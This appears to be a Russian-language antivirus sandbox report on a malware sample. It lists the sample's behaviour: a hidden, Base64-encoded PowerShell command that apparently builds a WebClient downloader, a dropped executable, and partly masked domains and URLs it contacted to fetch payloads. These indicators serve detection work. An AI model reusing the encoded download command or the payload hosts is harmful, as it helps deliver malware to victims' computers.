Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAEEAeABVADQAQQBBAEEAPQAoACcAYQBDAFgAUQAnACsAJwBfACcAKwAnAEEAQQAnACkAOwAkAEwAQQBBAEMAUQBBAEQAQQA9ACYAKAAnAG4AJwArACcAZQB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1548
- %TEMP%\1008406.cvr
- %HOMEPATH%\898.exe
- %HOMEPATH%\898.exe
- 'va#####otorwerks.com':80
- 'va###ronsen.com':80
- 'li###aenova.org':80
- 'li###aenova.org':443
- http://va#####otorwerks.com/contenteditor_files/1b/
- http://va###ronsen.com/test/b6J/
- http://li###aenova.org/administrator/TV/
- 'li###aenova.org':443
- DNS ASK va#####otorwerks.com
- DNS ASK va###ronsen.com
- DNS ASK 31###use.com
- DNS ASK li###aenova.org
- DNS ASK lg####.vatelstudents.fr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABXAEEAeABVADQAQQBBAEEAPQAoACcAYQBDAFgAUQAnACsAJwBfACcAKwAnAEEAQQAnACkAOwAkAEwAQQBBAEMAUQBBAEQAQQA9ACYAKAAnAG4AJwArACcAZQB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG...' (со скрытым окном)